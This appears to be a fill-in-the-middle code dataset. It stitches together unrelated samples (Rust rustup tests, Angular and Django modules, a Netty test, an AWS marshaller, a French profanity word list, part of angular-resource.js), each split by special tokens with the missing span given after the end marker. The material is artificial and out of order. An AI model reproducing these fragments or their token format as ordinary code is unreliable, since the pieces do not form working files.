assert!(out.stdout.contains("Continue? (y/N)"));
assert!(!out.stdout.contains(
"warning: continuing (because the -y flag is set and the error is ignorable)"
))
})
}
#[test]
fn test_warn_succeed_if_rustup_sh_already_installed_y_flag() {
setup(&|config| {
create_rustup_sh_metadata(&config);
let out = run_input(config, &["rustup-init", "-y"], "");
assert!(out.ok);
assert!(out
.stderr
.contains("warning: it looks like you have existing rustup.sh metadata"));
assert!(out
.stderr
.contains("error: cannot install while rustup.sh is installed"));
assert!(out.stderr.contains(
"warning: continuing (because the -y flag is set and the error is ignorable)"
));
assert!(!out.stdout.contains("Continue? (y/N)"));
})
}
#[test]
fn test_succeed_if_rustup_sh_already_installed_env_var_set() {
setup(&|config| {
create_rustup_sh_metadata(&config);
let out = run_input_with_env(
config,
&["rustup-init", "-y"],
"",
&[("RUSTUP_INIT_SKIP_EXISTENCE_CHECKS", "yes")],
);
assert!(out.ok);
assert!(!out
.stderr
.contains("warning: it looks like you have existing rustup.sh metadata"));
assert!(!out
.stderr
.contains("error: cannot install while rustup.sh is installed"));
assert!(!out.stderr.contains(
"warning: continuing (because the -y flag is set and the error is ignorable)"
));
assert!(!out.stdout.contains("Continue? (y/N)"));
})
}
#[test]
fn installing_when_already_installed_updates_toolchain() {
setup(&|config| {
run_input(config, &["rustup-init"], "\n\n");
let out = run_input(config, &["rustup-init"], "\n\n");
println!("stdout:\n{}\n...\n", out.stdout);
assert!(out
.stdout
.contains(for_host!("stable-{} unchanged - 1.1.0 (hash-stable-1.1.0)")));
})
}<|fim▁end|>
| |
<|file_name|>static-module.module.ts<|end_file_name|><|fim▁begin|>import {
StarRatingModule,
StarRatingConfigService,
} from '@angular-star-rating-lib/angular-star-rating';
import { CommonModule } from '@angular/common';
import { NgModule } from '@angular/core';
import { RouterModule } from '@angular/router';
import { CustomConfigComponent } from './custom-config.component';
import { CustomLocalConfigComponent } from './custom-local-config.component';
import { CustomConfigService } from './custom-config.service';
@NgModule({
imports: [<|fim▁hole|> RouterModule.forChild([
{
path: 'static-config-override',
component: CustomConfigComponent,
},
]),
],
declarations: [CustomConfigComponent, CustomLocalConfigComponent],
providers: [
{
provide: StarRatingConfigService,
useClass: CustomConfigService,
},
],
})
export class StaticModuleModule {}<|fim▁end|>
|
CommonModule,
StarRatingModule.forChild(),
|
<|file_name|>french.py<|end_file_name|><|fim▁begin|>import sys
from .space_delimited import SpaceDelimited
try:
from nltk.stem.snowball import SnowballStemmer
stemmer = SnowballStemmer("french")
except ValueError:
raise ImportError("Could not load stemmer for {0}. ".format(__name__))
try:
from nltk.corpus import stopwords as nltk_stopwords
stopwords = set(nltk_stopwords.words('french') + ["a"])
except LookupError:
raise ImportError("Could not load stopwords for {0}. ".format(__name__) +
"You may need to install the nltk 'stopwords' " +
"corpora. See http://www.nltk.org/data.html")
try:
import enchant
dictionary = enchant.Dict("fr")
except enchant.errors.DictNotFoundError:
raise ImportError("No enchant-compatible dictionary found for 'fr'. " +
"Consider installing 'myspell-fr'.")
badwords = [
r"con",
r"fesse", r"foutre",
r"merde+", r"merdique",
r"prostituee?", r"putain", r"putes",
r"salop", r"stupide",
]
sys.modules[__name__] = SpaceDelimited(
__name__,
doc="""
french
======
revision
--------
.. autoattribute:: revision.words
.. autoattribute:: revision.content_words
.. autoattribute:: revision.badwords
.. autoattribute:: revision.misspellings
.. autoattribute:: revision.infonoise
parent_revision
---------------
.. autoattribute:: parent_revision.words
.. autoattribute:: parent_revision.content_words
.. autoattribute:: parent_revision.badwords
.. autoattribute:: parent_revision.misspellings<|fim▁hole|>----
.. autoattribute:: diff.words_added
.. autoattribute:: diff.words_removed
.. autoattribute:: diff.badwords_added
.. autoattribute:: diff.badwords_removed
.. autoattribute:: diff.misspellings_added
.. autoattribute:: diff.misspellings_removed
""",
badwords=badwords,
dictionary=dictionary,
stemmer=stemmer,
stopwords=stopwords
)<|fim▁end|>
|
.. autoattribute:: parent_revision.infonoise
diff
|
<|file_name|>Mailer.js<|end_file_name|><|fim▁begin|>import { sendMail } from '../functions/sendMail';
import { unsubscribe } from '../functions/unsubscribe';
export const Mailer = {
sendMail,<|fim▁hole|><|fim▁end|>
|
unsubscribe,
};
|
<|file_name|>OioOioSocketCompatibleObjectStreamEchoTest.java<|end_file_name|><|fim▁begin|>/*
* Copyright 2012 The Netty Project
*
* The Netty Project licenses this file to you under the Apache License,
* version 2.0 (the "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*/
package org.jboss.netty.handler.codec.serialization;
import java.util.concurrent.Executor;<|fim▁hole|>import org.jboss.netty.channel.socket.oio.OioServerSocketChannelFactory;
public class OioOioSocketCompatibleObjectStreamEchoTest extends AbstractSocketCompatibleObjectStreamEchoTest {
@Override
protected ChannelFactory newClientSocketChannelFactory(Executor executor) {
return new OioClientSocketChannelFactory(executor);
}
@Override
protected ChannelFactory newServerSocketChannelFactory(Executor executor) {
return new OioServerSocketChannelFactory(executor, executor);
}
}<|fim▁end|>
|
import org.jboss.netty.channel.ChannelFactory;
import org.jboss.netty.channel.socket.oio.OioClientSocketChannelFactory;
|
<|file_name|>loop.js<|end_file_name|><|fim▁begin|>import {stats} from './stats.js';
import {core} from './core.js';
import {tasks} from './tasks.js';
const scenesRenderInfo = {}; // Used for throttling FPS for each Scene
const tickEvent = {
sceneId: null,
time: null,
startTime: null,
prevTime: null,
deltaTime: null
};
const taskBudget = 10; // Millisecs we're allowed to spend on tasks in each frame
const fpsSamples = [];
const numFPSSamples = 30;
let lastTime = 0;
let elapsedTime;
let totalFPS = 0;
const frame = function () {
let time = Date.now();
if (lastTime > 0) { // Log FPS stats
elapsedTime = time - lastTime;
var newFPS = 1000 / elapsedTime; // Moving average of FPS
totalFPS += newFPS;
fpsSamples.push(newFPS);
if (fpsSamples.length >= numFPSSamples) {
totalFPS -= fpsSamples.shift();
}
stats.frame.fps = Math.round(totalFPS / fpsSamples.length);
}
runTasks(time);
fireTickEvents(time);
renderScenes();
lastTime = time;
window.requestAnimationFrame(frame);
};
function runTasks(time) { // Process as many enqueued tasks as we can within the per-frame task budget
const tasksRun = tasks.runTasks(time + taskBudget);
const tasksScheduled = tasks.getNumTasks();
stats.frame.tasksRun = tasksRun;
stats.frame.tasksScheduled = tasksScheduled;
stats.frame.tasksBudget = taskBudget;
}
function fireTickEvents(time) { // Fire tick event on each Scene
tickEvent.time = time;
for (var id in core.scenes) {
if (core.scenes.hasOwnProperty(id)) {
var scene = core.scenes[id];
tickEvent.sceneId = id;
tickEvent.startTime = scene.startTime;
tickEvent.deltaTime = tickEvent.prevTime != null ? tickEvent.time - tickEvent.prevTime : 0;
/**
* Fired on each game loop iteration.
*
* @event tick
* @param {String} sceneID The ID of this Scene.
* @param {Number} startTime The time in seconds since 1970 that this Scene was instantiated.<|fim▁hole|> */
scene.fire("tick", tickEvent, true);
}
}
tickEvent.prevTime = time;
}
function renderScenes() {
const scenes = core.scenes;
const forceRender = false;
let scene;
let renderInfo;
let ticksPerRender;
let id;
for (id in scenes) {
if (scenes.hasOwnProperty(id)) {
scene = scenes[id];
renderInfo = scenesRenderInfo[id];
if (!renderInfo) {
renderInfo = scenesRenderInfo[id] = {}; // FIXME
}
ticksPerRender = scene.ticksPerRender;
if (renderInfo.ticksPerRender !== ticksPerRender) {
renderInfo.ticksPerRender = ticksPerRender;
renderInfo.renderCountdown = ticksPerRender;
}
if (--renderInfo.renderCountdown === 0) {
scene.render(forceRender);
renderInfo.renderCountdown = ticksPerRender;
}
}
}
}
window.requestAnimationFrame(frame);
const loop = {};
export{loop};<|fim▁end|>
|
* @param {Number} time The time in seconds since 1970 of this "tick" event.
* @param {Number} prevTime The time of the previous "tick" event from this Scene.
* @param {Number} deltaTime The time in seconds since the previous "tick" event from this Scene.
|
<|file_name|>test.splitRange.js<|end_file_name|><|fim▁begin|><|fim▁hole|>/**
* Created by tushar.mathur on 26/01/16.
*/
'use strict'
import test from 'ava'
import splitRange from '../src/splitRange'
test((t) => {
t.same(splitRange(100, 2), [[0, 49], [50, 100]])
t.same(splitRange(100, 3), [[0, 32], [33, 65], [66, 100]])
})<|fim▁end|>
| |
<|file_name|>dates.py<|end_file_name|><|fim▁begin|>import logging
from datetime import datetime
from django import template
from django.utils import timezone
register = template.Library()
logger = logging.getLogger(__name__)
@register.filter(expects_localtime=True)
def fuzzy_time(time):
"""Formats a `datetime.time` object relative to the current time."""
dt = time_to_date(time)
return fuzzy_date(dt)
@register.filter(expects_localtime=True)
def time_to_date(time):
"""Returns a `datetime.datetime` object from a `datetime.time` object using the current date."""
return datetime.combine(timezone.localdate(), time)
@register.filter(expects_localtime=True)
def fuzzy_date(date):
"""Formats a `datetime.datetime` object relative to the current time."""
if date.tzinfo is None:
date = timezone.make_aware(date)
<|fim▁hole|> if date <= now:
diff = now - date
seconds = diff.total_seconds()
minutes = seconds // 60
hours = minutes // 60
if minutes <= 1:
return "moments ago"
elif minutes < 60:
return "{} minutes ago".format(int(seconds // 60))
elif hours < 24:
hrs = int(diff.seconds // (60 * 60))
return "{} hour{} ago".format(hrs, "s" if hrs != 1 else "")
elif diff.days == 1:
return "yesterday"
elif diff.days < 7:
return "{} days ago".format(int(seconds // (60 * 60 * 24)))
elif diff.days < 14:
return date.strftime("last %A")
else:
return date.strftime("%A, %B %d, %Y")
else:
diff = date - now
seconds = diff.total_seconds()
minutes = seconds // 60
hours = minutes // 60
if minutes <= 1:
return "moments ago"
elif minutes < 60:
return "in {} minutes".format(int(seconds // 60))
elif hours < 24:
hrs = int(diff.seconds // (60 * 60))
return "in {} hour{}".format(hrs, "s" if hrs != 1 else "")
elif diff.days == 1:
return "tomorrow"
elif diff.days < 7:
return "in {} days".format(int(seconds // (60 * 60 * 24)))
elif diff.days < 14:
return date.strftime("next %A")
else:
return date.strftime("%A, %B %d, %Y")<|fim▁end|>
|
now = timezone.localtime()
|
<|file_name|>AccountDetailMarshaller.java<|end_file_name|><|fim▁begin|>/*
* Copyright 2017-2022 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*/
package com.amazonaws.services.macie2.model.transform;
import javax.annotation.Generated;
import com.amazonaws.SdkClientException;
import com.amazonaws.services.macie2.model.*;
import com.amazonaws.protocol.*;
import com.amazonaws.annotation.SdkInternalApi;
/**
* AccountDetailMarshaller
*/
@Generated("com.amazonaws:aws-java-sdk-code-generator")
@SdkInternalApi
public class AccountDetailMarshaller {
private static final MarshallingInfo<String> ACCOUNTID_BINDING = MarshallingInfo.builder(MarshallingType.STRING).marshallLocation(MarshallLocation.PAYLOAD)
.marshallLocationName("accountId").build();
private static final MarshallingInfo<String> EMAIL_BINDING = MarshallingInfo.builder(MarshallingType.STRING).marshallLocation(MarshallLocation.PAYLOAD)
.marshallLocationName("email").build();
private static final AccountDetailMarshaller instance = new AccountDetailMarshaller();
public static AccountDetailMarshaller getInstance() {
return instance;
}
/**
* Marshall the given parameter object.
*/<|fim▁hole|>
if (accountDetail == null) {
throw new SdkClientException("Invalid argument passed to marshall(...)");
}
try {
protocolMarshaller.marshall(accountDetail.getAccountId(), ACCOUNTID_BINDING);
protocolMarshaller.marshall(accountDetail.getEmail(), EMAIL_BINDING);
} catch (Exception e) {
throw new SdkClientException("Unable to marshall request to JSON: " + e.getMessage(), e);
}
}
}<|fim▁end|>
|
public void marshall(AccountDetail accountDetail, ProtocolMarshaller protocolMarshaller) {
|
<|file_name|>hostname.rs<|end_file_name|><|fim▁begin|>use std::borrow::Cow;
use into_cow::IntoCow;
use config::Config;
use nix;
pub struct Hostname<'a> {
hostname: Cow<'a, str>,
}
impl<'a> Hostname<'a> {
pub fn new<H: IntoCow<'a, str>>(hostname: H) -> Self {
Hostname {
hostname: hostname.into_cow(),
}
}<|fim▁hole|>impl<'a> Config for Hostname<'a> {
fn prepare(&self) -> nix::Result<()> {
nix::unistd::sethostname(self.hostname.as_bytes())
}
}<|fim▁end|>
|
}
|
<|file_name|>angular-resource.js<|end_file_name|><|fim▁begin|>/**
* @license AngularJS v1.6.10
* (c) 2010-2018 Google, Inc. http://angularjs.org
* License: MIT
*/
(function(window, angular) {'use strict';
var $resourceMinErr = angular.$$minErr('$resource');
// Helper functions and regex to lookup a dotted path on an object
// stopping at undefined/null. The path must be composed of ASCII
// identifiers (just like $parse)
var MEMBER_NAME_REGEX = /^(\.[a-zA-Z_$@][0-9a-zA-Z_$@]*)+$/;
function isValidDottedPath(path) {
return (path != null && path !== '' && path !== 'hasOwnProperty' &&
MEMBER_NAME_REGEX.test('.' + path));
}
function lookupDottedPath(obj, path) {
if (!isValidDottedPath(path)) {
throw $resourceMinErr('badmember', 'Dotted member path "@{0}" is invalid.', path);
}
var keys = path.split('.');
for (var i = 0, ii = keys.length; i < ii && angular.isDefined(obj); i++) {
var key = keys[i];
obj = (obj !== null) ? obj[key] : undefined;
}
return obj;
}
/**
* Create a shallow copy of an object and clear other fields from the destination
*/
function shallowClearAndCopy(src, dst) {
dst = dst || {};
angular.forEach(dst, function(value, key) {
delete dst[key];
});
for (var key in src) {
if (src.hasOwnProperty(key) && !(key.charAt(0) === '$' && key.charAt(1) === '$')) {
dst[key] = src[key];
}
}
return dst;
}
/**
* @ngdoc module
* @name ngResource
* @description
*
* The `ngResource` module provides interaction support with RESTful services
* via the $resource service.
*
* See {@link ngResource.$resourceProvider} and {@link ngResource.$resource} for usage.
*/
/**
* @ngdoc provider
* @name $resourceProvider
*
* @description<|fim▁hole|> * service.
*
* ## Dependencies
* Requires the {@link ngResource } module to be installed.
*
*/
/**
* @ngdoc service
* @name $resource
* @requires $http
* @requires ng.$log
* @requires $q
* @requires ng.$timeout
*
* @description
* A factory which creates a resource object that lets you interact with
* [RESTful](http://en.wikipedia.org/wiki/Representational_State_Transfer) server-side data sources.
*
* The returned resource object has action methods which provide high-level behaviors without
* the need to interact with the low level {@link ng.$http $http} service.
*
* Requires the {@link ngResource `ngResource`} module to be installed.
*
* By default, trailing slashes will be stripped from the calculated URLs,
* which can pose problems with server backends that do not expect that
* behavior. This can be disabled by configuring the `$resourceProvider` like
* this:
*
* ```js
app.config(['$resourceProvider', function($resourceProvider) {
// Don't strip trailing slashes from calculated URLs
$resourceProvider.defaults.stripTrailingSlashes = false;
}]);
* ```
*
* @param {string} url A parameterized URL template with parameters prefixed by `:` as in
* `/user/:username`. If you are using a URL with a port number (e.g.
* `http://example.com:8080/api`), it will be respected.
*
* If you are using a url with a suffix, just add the suffix, like this:
* `$resource('http://example.com/resource.json')` or `$resource('http://example.com/:id.json')`
* or even `$resource('http://example.com/resource/:resource_id.:format')`
* If the parameter before the suffix is empty, :resource_id in this case, then the `/.` will be
* collapsed down to a single `.`. If you need this sequence to appear and not collapse then you
* can escape it with `/\.`.
*
* @param {Object=} paramDefaults Default values for `url` parameters. These can be overridden in
* `actions` methods. If a parameter value is a function, it will be called every time
* a param value needs to be obtained for a request (unless the param was overridden). The function
* will be passed the current data value as an argument.
*
* Each key value in the parameter object is first bound to url template if present and then any
* excess keys are appended to the url search query after the `?`.
*
* Given a template `/path/:verb` and parameter `{verb:'greet', salutation:'Hello'}` results in
* URL `/path/greet?salutation=Hello`.
*
* If the parameter value is prefixed with `@`, then the value for that parameter will be
* extracted from the corresponding property on the `data` object (provided when calling actions
* with a request body).
* For example, if the `defaultParam` object is `{someParam: '@someProp'}` then the value of
* `someParam` will be `data.someProp`.
* Note that the parameter will be ignored, when calling a "GET" action method (i.e. an action
* method that does not accept a request body)
*
* @param {Object.<Object>=} actions Hash with declaration of custom actions that will be available
* in addition to the default set of resource actions (see below). If a custom action has the same
* key as a default action (e.g. `save`), then the default action will be *overwritten*, and not
* extended.
*
* The declaration should be created in the format of {@link ng.$http#usage $http.config}:
*
* {action1: {method:?, params:?, isArray:?, headers:?, ...},
* action2: {method:?, params:?, isArray:?, headers:?, ...},
* ...}
*
* Where:
*
* - **`action`** – {string} – The name of action. This name becomes the name of the method on
* your resource object.
* - **`method`** – {string} – Case insensitive HTTP method (e.g. `GET`, `POST`, `PUT`,
* `DELETE`, `JSONP`, etc).
* - **`params`** – {Object=} – Optional set of pre-bound parameters for this action. If any of
* the parameter value is a function, it will be called every time when a param value needs to
* be obtained for a request (unless the param was overridden). The function will be passed the
* current data value as an argument.
* - **`url`** – {string} – action specific `url` override. The url templating is supported just
* like for the resource-level urls.
* - **`isArray`** – {boolean=} – If true then the returned object for this action is an array,
* see `returns` section.
* - **`transformRequest`** –
* `{function(data, headersGetter)|Array.<function(data, headersGetter)>}` –
* transform function or an array of such functions. The transform function takes the http
* request body and headers and returns its transformed (typically serialized) version.
* By default, transformRequest will contain one function that checks if the request data is
* an object and serializes it using `angular.toJson`. To prevent this behavior, set
* `transformRequest` to an empty array: `transformRequest: []`
* - **`transformResponse`** –
* `{function(data, headersGetter, status)|Array.<function(data, headersGetter, status)>}` –
* transform function or an array of such functions. The transform function takes the http
* response body, headers and status and returns its transformed (typically deserialized)
* version.
* By default, transformResponse will contain one function that checks if the response looks
* like a JSON string and deserializes it using `angular.fromJson`. To prevent this behavior,
* set `transformResponse` to an empty array: `transformResponse: []`
* - **`cache`** – `{boolean|Cache}` – If true, a default $http cache will be used to cache the
* GET request, otherwise if a cache instance built with
* {@link ng.$cacheFactory $cacheFactory} is supplied, this cache will be used for
* caching.
* - **`timeout`** – `{number}` – timeout in milliseconds.<br />
* **Note:** In contrast to {@link ng.$http#usage $http.config}, {@link ng.$q promises} are
* **not** supported in $resource, because the same value would be used for multiple requests.
* If you are looking for a way to cancel requests, you should use the `cancellable` option.
* - **`cancellable`** – `{boolean}` – if set to true, the request made by a "non-instance" call
* will be cancelled (if not already completed) by calling `$cancelRequest()` on the call's
* return value. Calling `$cancelRequest()` for a non-cancellable or an already
* completed/cancelled request will have no effect.<br />
* - **`withCredentials`** - `{boolean}` - whether to set the `withCredentials` flag on the
* XHR object. See
* [requests with credentials](https://developer.mozilla.org/en/http_access_control#section_5)
* for more information.
* - **`responseType`** - `{string}` - see
* [requestType](https://developer.mozilla.org/en-US/docs/DOM/XMLHttpRequest#responseType).
* - **`interceptor`** - `{Object=}` - The interceptor object has two optional methods -
* `response` and `responseError`. Both `response` and `responseError` interceptors get called
* with `http response` object. See {@link ng.$http $http interceptors}. In addition, the
* resource instance or array object is accessible by the `resource` property of the
* `http response` object.
* Keep in mind that the associated promise will be resolved with the value returned by the
* response interceptor, if one is specified. The default response interceptor returns
* `response.resource` (i.e. the resource instance or array).
* - **`hasBody`** - `{boolean}` - allows to specify if a request body should be included or not.
* If not specified only POST, PUT and PATCH requests will have a body.
*
* @param {Object} options Hash with custom settings that should extend the
* default `$resourceProvider` behavior. The supported options are:
*
* - **`stripTrailingSlashes`** – {boolean} – If true then the trailing
* slashes from any calculated URL will be stripped. (Defaults to true.)
* - **`cancellable`** – {boolean} – If true, the request made by a "non-instance" call will be
* cancelled (if not already completed) by calling `$cancelRequest()` on the call's return value.
* This can be overwritten per action. (Defaults to false.)
*
* @returns {Object} A resource "class" object with methods for the default set of resource actions
* optionally extended with custom `actions`. The default set contains these actions:
* ```js
* { 'get': {method:'GET'},
* 'save': {method:'POST'},
* 'query': {method:'GET', isArray:true},
* 'remove': {method:'DELETE'},
* 'delete': {method:'DELETE'} };
* ```
*
* Calling these methods invoke an {@link ng.$http} with the specified http method,
* destination and parameters. When the data is returned from the server then the object is an
* instance of the resource class. The actions `save`, `remove` and `delete` are available on it
* as methods with the `$` prefix. This allows you to easily perform CRUD operations (create,
* read, update, delete) on server-side data like this:
* ```js
* var User = $resource('/user/:userId', {userId:'@id'});
* var user = User.get({userId:123}, function() {
* user.abc = true;
* user.$save();
* });
* ```
*
* It is important to realize that invoking a $resource object method immediately returns an
* empty reference (object or array depending on `isArray`). Once the data is returned from the
* server the existing reference is populated with the actual data. This is a useful trick since
* usually the resource is assigned to a model which is then rendered by the view. Having an empty
* object results in no rendering, once the data arrives from the server then the object is
* populated with the data and the view automatically re-renders itself showing the new data. This
* means that in most cases one never has to write a callback function for the action methods.
*
* The action methods on the class object or instance object can be invoked with the following
* parameters:
*
* - "class" actions without a body: `Resource.action([parameters], [success], [error])`
* - "class" actions with a body: `Resource.action([parameters], postData, [success], [error])`
* - instance actions: `instance.$action([parameters], [success], [error])`
*
*
* When calling instance methods, the instance itself is used as the request body (if the action
* should have a body). By default, only actions using `POST`, `PUT` or `PATCH` have request
* bodies, but you can use the `hasBody` configuration option to specify whether an action
* should have a body or not (regardless of its HTTP method).
*
*
* Success callback is called with (value (Object|Array), responseHeaders (Function),
* status (number), statusText (string)) arguments, where the value is the populated resource
* instance or collection object. The error callback is called with (httpResponse) argument.
*
* Class actions return empty instance (with additional properties below).
* Instance actions return promise of the action.
*
* The Resource instances and collections have these additional properties:
*
* - `$promise`: the {@link ng.$q promise} of the original server interaction that created this
* instance or collection.
*
* On success, the promise is resolved with the same resource instance or collection object,
* updated with data from server. This makes it easy to use in
* {@link ngRoute.$routeProvider resolve section of $routeProvider.when()} to defer view
* rendering until the resource(s) are loaded.
*
* On failure, the promise is rejected with the {@link ng.$http http response} object.
*
* If an interceptor object was provided, the promise will instead be resolved with the value
* returned by the interceptor.
*
* - `$resolved`: `true` after first server interaction is completed (either with success or
* rejection), `false` before that. Knowing if the Resource has been resolved is useful in
* data-binding.
*
* The Resource instances and collections have these additional methods:
*
* - `$cancelRequest`: If there is a cancellable, pending request related to the instance or
* collection, calling this method will abort the request.
*
* The Resource instances have these additional methods:
*
* - `toJSON`: It returns a simple object without any of the extra properties added as part of
* the Resource API. This object can be serialized through {@link angular.toJson} safely
* without attaching AngularJS-specific fields. Notice that `JSON.stringify` (and
* `angular.toJson`) automatically use this method when serializing a Resource instance
* (see [MDN](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/JSON/stringify#toJSON%28%29_behavior)).
*
* @example
*
* ### Credit card resource
*
* ```js
// Define CreditCard class
var CreditCard = $resource('/user/:userId/card/:cardId',
{userId:123, cardId:'@id'}, {
charge: {method:'POST', params:{charge:true}}
});
// We can retrieve a collection from the server
var cards = CreditCard.query(function() {
// GET: /user/123/card
// server returns: [ {id:456, number:'1234', name:'Smith'} ];
var card = cards[0];
// each item is an instance of CreditCard
expect(card instanceof CreditCard).toEqual(true);
card.name = "J. Smith";
// non GET methods are mapped onto the instances
card.$save();
// POST: /user/123/card/456 {id:456, number:'1234', name:'J. Smith'}
// server returns: {id:456, number:'1234', name: 'J. Smith'};
// our custom method is mapped as well.
card.$charge({amount:9.99});
// POST: /user/123/card/456?amount=9.99&charge=true {id:456, number:'1234', name:'J. Smith'}
});
// we can create an instance as well
var newCard = new CreditCard({number:'0123'});
newCard.name = "Mike Smith";
newCard.$save();
// POST: /user/123/card {number:'0123', name:'Mike Smith'}
// server returns: {id:789, number:'0123', name: 'Mike Smith'};
expect(newCard.id).toEqual(789);
* ```
*
* The object returned from this function execution is a resource "class" which has "static" method
* for each action in the definition.
*
* Calling these methods invoke `$http` on the `url` template with the given `method`, `params` and
* `headers`.
*
* @example
*
* ### User resource
*
* When the data is returned from the server then the object is an instance of the resource type and
* all of the non-GET methods are available with `$` prefix. This allows you to easily support CRUD
* operations (create, read, update, delete) on server-side data.
```js
var User = $resource('/user/:userId', {userId:'@id'});
User.get({userId:123}, function(user) {
user.abc = true;
user.$save();
});
```
*
* It's worth noting that the success callback for `get`, `query` and other methods gets passed
* in the response that came from the server as well as $http header getter function, so one
* could rewrite the above example and get access to http headers as:
*
```js
var User = $resource('/user/:userId', {userId:'@id'});
User.get({userId:123}, function(user, getResponseHeaders){
user.abc = true;
user.$save(function(user, putResponseHeaders) {
//user => saved user object
//putResponseHeaders => $http header getter
});
});
```
*
* You can also access the raw `$http` promise via the `$promise` property on the object returned
*
```
var User = $resource('/user/:userId', {userId:'@id'});
User.get({userId:123})
.$promise.then(function(user) {
$scope.user = user;
});
```
*
* @example
*
* ### Creating a custom 'PUT' request
*
* In this example we create a custom method on our resource to make a PUT request
* ```js
* var app = angular.module('app', ['ngResource', 'ngRoute']);
*
* // Some APIs expect a PUT request in the format URL/object/ID
* // Here we are creating an 'update' method
* app.factory('Notes', ['$resource', function($resource) {
* return $resource('/notes/:id', null,
* {
* 'update': { method:'PUT' }
* });
* }]);
*
* // In our controller we get the ID from the URL using ngRoute and $routeParams
* // We pass in $routeParams and our Notes factory along with $scope
* app.controller('NotesCtrl', ['$scope', '$routeParams', 'Notes',
function($scope, $routeParams, Notes) {
* // First get a note object from the factory
* var note = Notes.get({ id:$routeParams.id });
* $id = note.id;
*
* // Now call update passing in the ID first then the object you are updating
* Notes.update({ id:$id }, note);
*
* // This will PUT /notes/ID with the note object in the request payload
* }]);
* ```
*
* @example
*
* ### Cancelling requests
*
* If an action's configuration specifies that it is cancellable, you can cancel the request related
* to an instance or collection (as long as it is a result of a "non-instance" call):
*
```js
// ...defining the `Hotel` resource...
var Hotel = $resource('/api/hotel/:id', {id: '@id'}, {
// Let's make the `query()` method cancellable
query: {method: 'get', isArray: true, cancellable: true}
});
// ...somewhere in the PlanVacationController...
...
this.onDestinationChanged = function onDestinationChanged(destination) {
// We don't care about any pending request for hotels
// in a different destination any more
this.availableHotels.$cancelRequest();
// Let's query for hotels in '<destination>'
// (calls: /api/hotel?location=<destination>)
this.availableHotels = Hotel.query({location: destination});
};
```
*
*/
angular.module('ngResource', ['ng']).
info({ angularVersion: '1.6.10' }).
provider('$resource', function ResourceProvider() {
var PROTOCOL_AND_IPV6_REGEX = /^https?:\/\/\[[^\]]*][^/]*/;
var provider = this;
/**
* @ngdoc property
* @name $resourceProvider#defaults
* @description
* Object containing default options used when creating `$resource` instances.
*
* The default values satisfy a wide range of usecases, but you may choose to overwrite any of
* them to further customize your instances. The available properties are:
*
* - **stripTrailingSlashes** – `{boolean}` – If true, then the trailing slashes from any
* calculated URL will be stripped.<br />
* (Defaults to true.)
* - **cancellable** – `{boolean}` – If true, the request made by a "non-instance" call will be
* cancelled (if not already completed) by calling `$cancelRequest()` on the call's return
* value. For more details, see {@link ngResource.$resource}. This can be overwritten per
* resource class or action.<br />
* (Defaults to false.)
* - **actions** - `{Object.<Object>}` - A hash with default actions declarations. Actions are
* high-level methods corresponding to RESTful actions/methods on resources. An action may
* specify what HTTP method to use, what URL to hit, if the return value will be a single
* object or a collection (array) of objects etc. For more details, see
* {@link ngResource.$resource}. The actions can also be enhanced or overwritten per resource
* class.<br />
* The default actions are:
* ```js
* {
* get: {method: 'GET'},
* save: {method: 'POST'},
* query: {method: 'GET', isArray: true},
* remove: {method: 'DELETE'},
* delete: {method: 'DELETE'}
* }
* ```
*
* #### Example
*
* For example, you can specify a new `update` action that uses the `PUT` HTTP verb:
*
* ```js
* angular.
* module('myApp').
* config(['$resourceProvider', function ($resourceProvider) {
* $resourceProvider.defaults.actions.update = {
* method: 'PUT'
* };
* }]);
* ```
*
* Or you can even overwrite the whole `actions` list and specify your own:
*
* ```js
* angular.
* module('myApp').
* config(['$resourceProvider', function ($resourceProvider) {
* $resourceProvider.defaults.actions = {
* create: {method: 'POST'},
* get: {method: 'GET'},
* getAll: {method: 'GET', isArray:true},
* update: {method: 'PUT'},
* delete: {method: 'DELETE'}
* };
* });
* ```
*
*/
this.defaults = {
// Strip slashes by default
stripTrailingSlashes: true,
// Make non-instance requests cancellable (via `$cancelRequest()`)
cancellable: false,
// Default actions configuration
actions: {
'get': {method: 'GET'},
'save': {method: 'POST'},
'query': {method: 'GET', isArray: true},
'remove': {method: 'DELETE'},
'delete': {method: 'DELETE'}
}
};
this.$get = ['$http', '$log', '$q', '$timeout', function($http, $log, $q, $timeout) {
var noop = angular.noop,
forEach = angular.forEach,
extend = angular.extend,
copy = angular.copy,
isArray = angular.isArray,
isDefined = angular.isDefined,
isFunction = angular.isFunction,
isNumber = angular.isNumber,
encodeUriQuery = angular.$$encodeUriQuery,
encodeUriSegment = angular.$$encodeUriSegment;
function Route(template, defaults) {
this.template = template;
this.defaults = extend({}, provider.defaults, defaults);
this.urlParams = {};
}
Route.prototype = {
setUrlParams: function(config, params, actionUrl) {
var self = this,
url = actionUrl || self.template,
val,
encodedVal,
protocolAndIpv6 = '';
var urlParams = self.urlParams = Object.create(null);
forEach(url.split(/\W/), function(param) {
if (param === 'hasOwnProperty') {
throw $resourceMinErr('badname', 'hasOwnProperty is not a valid parameter name.');
}
if (!(new RegExp('^\\d+$').test(param)) && param &&
(new RegExp('(^|[^\\\\]):' + param + '(\\W|$)').test(url))) {
urlParams[param] = {
isQueryParamValue: (new RegExp('\\?.*=:' + param + '(?:\\W|$)')).test(url)
};
}
});
url = url.replace(/\\:/g, ':');
url = url.replace(PROTOCOL_AND_IPV6_REGEX, function(match) {
protocolAndIpv6 = match;
return '';
});
params = params || {};
forEach(self.urlParams, function(paramInfo, urlParam) {
val = params.hasOwnProperty(urlParam) ? params[urlParam] : self.defaults[urlParam];
if (isDefined(val) && val !== null) {
if (paramInfo.isQueryParamValue) {
encodedVal = encodeUriQuery(val, true);
} else {
encodedVal = encodeUriSegment(val);
}
url = url.replace(new RegExp(':' + urlParam + '(\\W|$)', 'g'), function(match, p1) {
return encodedVal + p1;
});
} else {
